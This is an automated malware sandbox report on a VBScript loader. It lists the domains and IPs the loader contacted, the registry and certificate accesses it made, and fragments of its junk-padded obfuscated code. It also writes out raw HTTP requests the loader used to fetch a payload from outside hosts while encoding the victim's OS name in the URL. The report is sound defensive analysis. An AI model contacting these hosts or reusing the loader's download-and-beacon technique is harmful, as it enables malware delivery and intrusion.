MSG_225796.vbs
This report is generated from a file or URL submitted to this webservice on March 26th 2020 19:17:55 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 5 domains and 5 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Additional Context
Related Sandbox Artifacts
- Associated SHA256s
- 5bdcc34ba4899862751be2f95a86723e0271ee0ab18517d4bc9949502beabcb8
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 4
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
- source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 3/60 Antivirus vendors marked sample as malicious (5% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "37.9.175.9": ...
URL: http://gdpronline.sk/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA (AV positives: 5/76 scanned on 03/26/2020 18:53:38)
URL: https://app.jtrbot.com/ (AV positives: 1/76 scanned on 03/26/2020 14:52:45)
URL: http://topfest.sk/misc/farbtastic/css/login/customer_center/customer-IDPP00C149/myaccount/signin (AV positives: 5/76 scanned on 03/26/2020 07:10:23)
URL: http://zeleneatrium.sk/media-o-nas/v-trnave-rastie-slovensky-unikat/engine1/style.css (AV positives: 1/76 scanned on 03/25/2020 15:16:10)
URL: http://zeleneatrium.sk/priebeh-vystavby/fotogaleria/2014-august/engine1/engine1/engine1/engine1/engine1/engine1/engine1/engine1/engine1/style.css (AV positives: 2/76 scanned on 03/24/2020 15:21:44)
File SHA256: 72ec27bd0d959a1e6713d96b4e55c5a9b92ac6d1b5b5a4a8d5d1211422fcee57 (AV positives: 1/73 scanned on 03/09/2020 11:39:35)
File SHA256: 92bff682e991c90a5500a0eb271a435bc3dcbda30cd82a620151351f9c3ac23f (AV positives: 30/74 scanned on 01/02/2020 17:10:11)
File SHA256: bc48f37f3f29877d90cfbd99caf277460c625400f5984682c606a57ff0a62eb6 (AV positives: 32/73 scanned on 12/18/2019 14:21:05)
File SHA256: f4b2e4dcd3bc664b38e5de5783448b2d1c60469265d7609e6bc60139f8eb0c5b (Date: 12/18/2019 09:26:00)
File SHA256: 6f4ca7801ac1439bc13560e644c957e24a25159725920b74abf5bdc9898df475 (AV positives: 14/74 scanned on 12/09/2019 12:20:07)
File SHA256: 81e366b6105440fa9ca1304ea27ea5f00e4c9d5ca8b7f8ce4a5204b195fc1836 (Date: 11/20/2019 04:03:47)
File SHA256: d6e230c786755a00ea6d3886e556349c1f154eb9338b7f908f564dfe4a2486ce (Date: 11/20/2019 04:03:31)
File SHA256: a8c56d50c351156f03278bef850b74254fd9f71877c49ceb85355a36a8f93114 (Date: 11/20/2019 04:03:12)
File SHA256: 02eaf63fc74516b3dc235e4227fd79317b852c36b6828b5675db51881e20489d (Date: 11/20/2019 04:02:33)
File SHA256: e1e36b609ea094e304435ec4f82ef63c504e313aef9fbc26609b13e11d6fde98 (AV positives: 11/72 scanned on 11/14/2019 09:43:39) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 5
-
Anti-Reverse Engineering
-
Possibly checks for known debuggers/analysis tools
- details
-
"tic Betancourt watchkeeper syncretistic gph proportions uninterpolated altazimuth counterstrategies Aspidobranchiata discriminantal Doko sedative zequin superextreme korrigum incinerates 'Allin want chandelled Dilan interfibrous disapprobative antieducationist trapeze bottler windburned Millite gentle-spoken moonfall coffret haliplankton preimportantly Conilurus Denticeti Yannina Parseeism predeprive proconscription careless kuru Alpharetta fat-edged kilderkin razeing ausu Molluscoida ghbor Orenburg jateorhizin Frlein prolines unstercorated acing akala Anti-dreyfusard footlessness embloom dattock oxide scantling Hahnemannian recompilation dreidl wocheinite cuckoo-spittle structureless unsignificancy astrogeology crepey baudrons smoke-enrolled Paridae embrasures Pseudoscorpionida Absolute Lagas clinging noncircumscriptive Rio anglophobes Vladimar hyetometric frontways Jolla electroculture bloodnoun serotypes astrictive botry chemigraphic single-disk serially cursitate debuted diocoel pangamy butein Okmulgee ho" (Indicator: "ntice")
"YwSMehKkcuGDJMGuWPLRW=aYrBeXoQuqhhFIWuSpBe+YwSMehKkcuGDJMGuWPLRW
'uncanvassably wicca posologic handbreed anticapitalistic mahaleb autota bulbospinal columel argentum glimmering aristocratically chirarthritis cacciatore CSAB pseudoenthusiastic Paluxy Carrelli perennate infula town-house retroclusion malinger acanthous kellet nonsoberly Vachill polymastodont unquarrelsome luminant Negley Khnum old-fashioned sings agatized Tatu MAEd untilled ruggeder semianatropous xylograph knurlin Mongoyo rowlandite quillbacks water-glass ill-judged explain chierete twig-wrought wound Tudor Salim Tafilelt trochil quiles microcarpous scintillator Four-h shut-off anisometropic Dircaean Polymelus orthitic multiplication metaborate fire-crowned friendlessness ordinaries stay-bearer arty-craftiness kiddos Benincasa anticeremoniousness Non-celtic hydrochloride climactical congruously thrombostasis dowdier Kaaba curial exemplificative demonstrators unschematic Hebraica cataclasmic Piers terebral handgravure willyer Entwistle censive" (Indicator: "ntice")
"tricurvate live-bearer eurhythmical peptonaemia Jezabelle incantational seminovel conchiform irresolutions hypomyotonia chagrins antitypically unicuspid corn-planting unattained natatores Upland oblongatas pinguitude Bosniak reassures ceremonys tasseling Diospyraceae legoa multiflagellate gaincope Abednego round-wombed aurigerous flambes mystical preinvestment oligoclasite ically black-hearted whimsies forlet miracling jows Cameo enticements ore-handling commenting photogravure soonish invertase slim-leaved vochysiaceous" (Indicator: "ntice")
"dae lakier polymelia Karlise gunhouse credibility unenticeable Eaton integrates edgrow trainmen
mngtgALKEEaURsdwNILczRiMgSjv.dataType=bvnRYqHzCBLvlhcjOKHEIYc
cAceHVHXQCaRgtKSXqZtnvsaM=RAiXlXZIZtHaRkRFHkxDepga-RAiXlXZIZtHaRkRFHkxDepga
'evilest anchusine beefwoods Huterian pepinella hardbought cytomicrosome purple-spotted shrunken milligramage subhatcheries presuppress burnouts mobilia episodically neeze nonplurality maternity negligibleness tintiness blue-penciling diletant rustlingness linget getatableness BWR capillaries Dilemi fossa right-about-face basements woodenheaded ausform pennyflower uncastle paracoumaric sun-outshining megacephaly prereduction silver-tipped jolleyman binits Blamey agoraphobiac Gilby unrequested lilting Spindale thick-sown protext lacemaking miming conoscente legendaries Gamopetalae Post-eocene Sparky unencompassed Apelles claroes intervertebrally unfroze latheman weather-bitten dividually compassing goglet uredial nondexterous monosymmetrical Reimthursen superelegancies ma" (Indicator: "ntice")
"gangs vaccinationist Dinsmore multiprogram Haddonfield half-covered occipitobregmatic lovingness metabolize ophthalmologist laconisms retro-omental underfeet Bouchier assertorially stern-spoken misusers tear-melted unmanlier Kodachrome fourteenth declaratively bethinking unerrantly dynamists burdon phobism depeopled yellowtails volatiliser Melanorrhoea 'eartab snakewise condog intrudress inexplicitly miched posterial Meleager branchiurous charcoal-burner field-bed Danton rhodeose rhyme-inspiring duodenation stalag uterosclerosis handcrafts court-tialling appareled gridded katatype expressage chiffonnier capillarily abridgments magnanimousness Comarum heliograph milli- injuria unvoluptuous Romain mesotrochous nonequilateral Salvidor univalvate rescriptively camaraderie qiyas epiphyseolysis single-shooting can-crimping engine-sizer Otte counite habilimentation apprenticement superlies trenchering malgr cancel Falcunculus Irishy Sthenius Mastodonsaurus supranational soak herd-groom fixups emblazonment simulacriz" (Indicator: "ntice")
"llulifugal furied outflamed fager preprimitive boracic knighting skydived regrow unreproachingly duresses swooped ischioiliac stylography Pickton pancreatization dorsoposterior assidually outfled cystoelytroplasty phylloptosis Forras golden-gleaming chyazic high-potential sublimities
RAiXlXZIZtHaRkRFHkxDepga=xzFrQLnOaBbpWtdWOEPrSMjdMoQk+esdCFkqzmfhVIPXJwjwVLMmJiQ
'vice-freed narcotine hogmanays Westleigh slimmish ranty Chilomonas kohemp actinally equalizing podlike lamentingly myomatous surface-deposited flavine sesqui apostrophize corymbiferous Pulvinaria apprenticeships communalise reversi Beora smallboy expirate tumasha tripinnatisect obligator mixups amelus pearlier mugwort relanced reiterativeness subtilized momisms ws mastics meiny tergal strigillose guaraguao Molniya hydro-ski desulfuriser maestosos towcock paralactate sextodecimos Noricum Rakel gallantly Lissie macrobiotic Hesta shyer reparate internuptial unmedullated talayot Russian-owned windlassed supervive squelchingly hugged oyster-catc" (Indicator: "ntice")
"pending bemixt amnesias phagodynamometer berthierite trirhomboidal coop. uranoscopia enamors wharfmaster mansonry buckstone freddo drometer hydrae well-acquainted well-tanned subtransparentness collectivum drownded vallis Rockland 'opposites darnedest Hank antecedaneous carpetmaker Chatot desist gastrulation unploughed contrabandage proevolution toozle milkinesses releasable cosmist swellheads Wabeno deadheading unconsociated hangwoman parasol jokeproof unobscene xerotherm orgamy syllabical Kooskia cocainism piggiest uncalculableness valebant clitella benightedness rehayte obligates smalming acusection south-southeasterly sacramentalist laconizer phosphagen woolwinder codewords Bhudan mesmeric regradated aglint Easterner putrefactive profitters weak-bodied inhibitions infesters Kippy prodromes pea-soupy chiefest apprenticement eurythmics lyrist cancerousness Caffrey androconia siphonorhinal tam-o-shantered auburn-haired craniofacial FSK tunable semihumanism puffballs successlessly fringiest Tiersten tropal ne" (Indicator: "ntice")
"osal prefeudalism Wenn rosety four-shilling Yenan land-water Poduridae smarties Pliner niepa naggish episcotister carbunculation Brassavola Brocky rubble-work sciaenoid tranquillizers alexin 'posh sausage-fingered unbowled biters efference fishpot Pinacoceras Norby fictionalizing Walhall One-two-three phallical glossophagine saturnize CRC subers unilluminated wastebaskets agrimonies compulsivity anticamera re-enunciation anticeremoniously glorify scrogie presuitable nazir objectification halcyons thymate Beaumontia woolweed Bagwell disregards Hecatonchires deep-downness unseduced haemostat schmoe sloken dorsel Centerville reattack dockyardman harnessless lattice-window begloomed impenetrabilities policemanism apiculation signalling breaking-in empiricism bawsunt rehearse para-appendicitis brindled Castara unwrap yuke amphithalami Myrna footies haberdasheries premanifestation scrutinies likuta subframe antennula twice-remitted throughbear joyride punchlike lashed boatswains unproduceable Castoridae suranal bio" (Indicator: "ntice")
"'overpopulating vapourific fulfilled electrograving artfulness Janeen nucellus proscholasticism dumbness erasion genitofemoral Link silicocalcareous Scornik acquaintancy pugilists Muscovi untalked-of subfluid circumviate whole-eared nonvulval disrelish devotions tar-brush arbalists juneating corollarys congregants Angadresma focused incomprehendingly well-striven electrocutes almas Zmudz prodelision Hervey uncoils brasque unscrewable empoisoner sleuth-hound ungracious few-toothed Proustian anorchous unflown hoggee lenticels medioposterior inebriated ribbon-bound overexpressiveness standard-wing taprooms XUV whisperer cattlemen gemotes peytral Avera Nadya nonconvertibility unisulcate free-willer unswaggeringly nonhabitability sanga pissant molecularity bdellometer tunu frontingly henting grinderies stanitsa Guarneri Chamizal Acoemetae cadre synesthetic velyarde well-indexed ooplast potful homekeeper tramwaymen inosine academicism self-exposure comely unsteck LAvare tautonyms initialised Matisse unshot nontanni" (Indicator: "ntice")
"ing exponentiate shoppishness scatomas frontiersman CRFMP gravel-grass subsorter Pondicherry scaleless insubstantiality brachydactylic cultigens Columbella 'apophlegm wrinkliest discrown aye-ceaseless Bridgman unfielded pin-tailed pastime temptability narrow-streeted Ibby dew-sprinkled inosculated subprofitable cheirognomy nontannic anteprostate cyprinodontoid sandlots Entomostraca Lilly incopresentable oftwhiles uninterleave bifluoride etiolating retrocurved immigrants laystall halloaed Glenjean anywither Leucojum rode unflexible transgressional anticeremoniousness renitence ball-hooter Stesha ASK potentates rufous-brown small-clothes pneumatophoric thoracolysis regaled howel afros unbrooding coaugment ideomotor sourballs noncounty de-emphasize campal spine-broken live-forever paratrophic elenctical Baxley laun demagog misalter nonstereotypical piglinghood Chalybean triangulated overstudiously stitchlike pharyngalgic Fradin neuroembryology dissevering pasquinaded iracund Sibiric G.A. salpicon Margreta purgea" (Indicator: "ntice")
"anda specifical Eland neckful laodah piraguas broker unpermanently alveolectomy Desiri Dodecanesian coumarilic argala charge-off Raff hephthemimeral Haletta nonchivalrous dodecahedric quadriarticulated clank aeolodion excruciatingly organographical centrally outfaces overkilled praisworthiness Amianthium griller meekling subtenancies ergotic idempotent Myers flaglike Jaenicke orate Christoval carry-in interschool pectizable thiocresol square-chinned well-hatched cyclophosphamides 'first-generation Shemu Verden semiaffectionate hyper rawnie Ben-Gurion spindle-legged forebodies disbodied preabsorb indonesians fancysick unidead PINE duros denticete Chonju fougue graininess avidnesses pickeringite catholicate cothamore unmisconceivable laboredly pay-rent waeness micrometeoritic daikering Crypto-jesuit Thunor tenacious branchio- outcasting imbower unsatisfiably well-nurtured plottery fasciate nonobviousness vauntlay lecherously teentsier Antonio miotics intertask sabbath-day divarication self-perpetuating populato" (Indicator: "ntice")
"'kelters two-twisted rareripe unwelde cotyledon pregeminum frazzle uncaking true-tongued sporogone disburser cruzados sulfured ventricles high-swollen friability antennulary fairgoing flashlamps gambir wren-thrush campaigns apprenticed banquets epigraphically grists lackeyship sorptions Archibaldo preoccupation nonradiance vanillic thermatologic siblings diagraphs superstructral stale-drunk unspiciness tilted Moluche sematology Ivanov spur-gall lorarii reoccurred Hirudinea unidleness rheostats nonadaptabness pyre manilio trimetrical atropous coled self-banishment tennis-court UNIDO procedurally Chauchat protozoal seignorage valediction Grundified malist woodcarvers Podunk committing sharry triglyphic Angleinlet mussably talliated premonarchial synostotically cashiers bustler aunter missional unpulsating nonvegetatively Semi-dutch disregular diffract wide-distant geoid-spheroid cyathiform lutherans quintescence LaRue umbrose dehull reoffered syngenism resilifer dissuitable disharmony pleurodiran treey Echinod" (Indicator: "ntice")
"'gruyeres outcast Eurymedon Arizona demivotary approachableness hobbing stond acetars unidirected myelapoplexy Coverdale zedoary disconsolately Hendersonville inhaul hilsah pluriparity Ortiz families man-midwife adverbial antipacifistic Benis upflower overbrilliantly paleoanthropography relaxable Yelich unpronounce occasional upright-minded oxytonesis inaptly unpalliative subslots magnesias cowlstaff outguiding fantasists ahurewa dechlorinating grailer appentice fibroangioma reawait Dolly empyreum publications scooch nonevasively exalt moschatelline serializing rcpt. mesenchymal critturs Ossetine endopods imamic customance typographia nonincandescent machila undermatched shillet metrophlebitis substratum Mosquito clannishly millifarad well-cured prodromous tendant uncontrolledly Harlequin promilitarism circuminsession herbier abet Anti-Lebanon swayableness studdie Charlotteville interinstitutional inobedience Dartmouth susurrate redeliberating tautoousious Comfrey annelidian amusee confract subdivine pepsine" (Indicator: "ntice")
"tFkJigtDNmoMBPjlJHjwIbjOSICEy=RGB(181,154,47)'chervonetz three-sided Holocephala superinquisitiveness Hibernicising variant inalimental adfrozen conundrum unfenced epigastriocele skully coadunating flatiron Laaspere estrapade denazify confusably fidding mealock antignostic Gudmundsson biennials IATSE pejorationist dead-anneal big-chested idan scutulated adrenolysis blennostasis Tangier skindive Cath. thiefproof late-model raphis side-door convenances isogons newfangledism Vinaya drools nucleation antipass pager abstractable anticeremonially counterpower myological never-never manages diameters syndicating empennages philol. Street phellogenic counterrevolutionist impudently dispending Muranese Kensington Rheims ridgelike Cowgill doxorubicin berakah Kulturkreise Jaen overlain crummiest laptops psychanalysis dithyrambic Aissaoua demonised sketchily warks Holcman prostatectomies gutter-snipe provascular one-roomed stodgery alisonite prenotifying well-dealing outblew endothelial unsmugly quileces autoelectrolysi" (Indicator: "ntice") - source
- File/Memory
- relevance
- 2/10
-
Possibly checks for known debuggers/analysis tools
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
3/76 reputation engines marked "http://www.kitaair.com" as malicious (3% detection rate)
2/76 reputation engines marked "http://gdpronline.sk" as malicious (2% detection rate)
3/76 reputation engines marked "http://kitaair.com" as malicious (3% detection rate)
2/76 reputation engines marked "http://hotdsk.com" as malicious (2% detection rate) - source
- External System
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
-
Installation/Persistance
-
Executes a visual basic script
- details
- Process "wscript.exe" with commandline ""C:\MSG_225796.vbs"" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Loads the task scheduler COM API
- details
-
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 73BE0000
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 01970000 - source
- Loaded Module
- relevance
- 5/10
- ATT&CK ID
- T1168 (Show technique in the MITRE ATT&CK™ matrix)
-
Executes a visual basic script
-
Network Related
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 173.249.60.219 on port 80 is sent without HTTP header
TCP traffic to 46.16.91.179 on port 80 is sent without HTTP header
TCP traffic to 46.16.91.179 on port 443 is sent without HTTP header
TCP traffic to 37.9.175.9 on port 80 is sent without HTTP header
TCP traffic to 77.104.140.85 on port 80 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
-
Informative 14
-
General
-
Accesses Software Policy Settings
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS"; Key: "") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Accesses System Certificates Settings
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Contacts domains
- details
-
"hotdsk.com"
"kitaair.com"
"gdpronline.sk"
"a.8xcornwall.com"
"www.kitaair.com" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"173.249.60.219:80"
"46.16.91.179:80"
"46.16.91.179:443"
"37.9.175.9:80"
"77.104.140.85:80" - source
- Network Traffic
- relevance
- 1/10
-
Loads the .NET runtime environment
- details
- "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 6C610000
- source
- Loaded Module
-
Logged script engine calls
- details
-
"wscript.exe" called "Msxml2.DOMDocument.3.0.CreateObject" ...
"wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.CreateObject" ... - source
- API Call
- relevance
- 10/10
-
Overview of unique CLSIDs touched in registry
- details
-
"wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
"wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
"wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
"wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
"wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
"wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
"wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
"wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
"wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
"wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
"wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
"wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
"wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
"wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
"wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
"wscript.exe" touched "Microsoft OLE DB Error Collection Service" (Path: "HKCU\CLSID\{C8B522CF-5CF3-11CE-ADE5-00AA0044773D}\TREATAS")
"wscript.exe" touched "ADO 6.0" (Path: "HKCU\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\EXTENDEDERRORS")
"wscript.exe" touched "ADODB Error Lookup Service" (Path: "HKCU\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\TREATAS") - source
- Registry Access
- relevance
- 3/10
-
Accesses Software Policy Settings
-
Installation/Persistance
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\wscript.exe"
"wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"wscript.exe" touched file "C:\Windows\System32\en-US\wscript.exe.mui"
"wscript.exe" touched file "C:\Windows\System32\rsaenh.dll"
"wscript.exe" touched file "C:\Windows\System32\stdole2.tlb"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch"
"wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
"wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
"wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
"wscript.exe" touched file "C:\Windows\System32\wbem\wbemdisp.tlb"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll" - source
- API Call
- relevance
- 7/10
-
Touches files in the Windows directory
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "hotdsk.com"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: hotdsk.com"
Heuristic match: "kitaair.com"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: kitaair.com"
Heuristic match: "gdpronline.sk"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: gdpronline.sk"
Heuristic match: "a.8xcornwall.com"
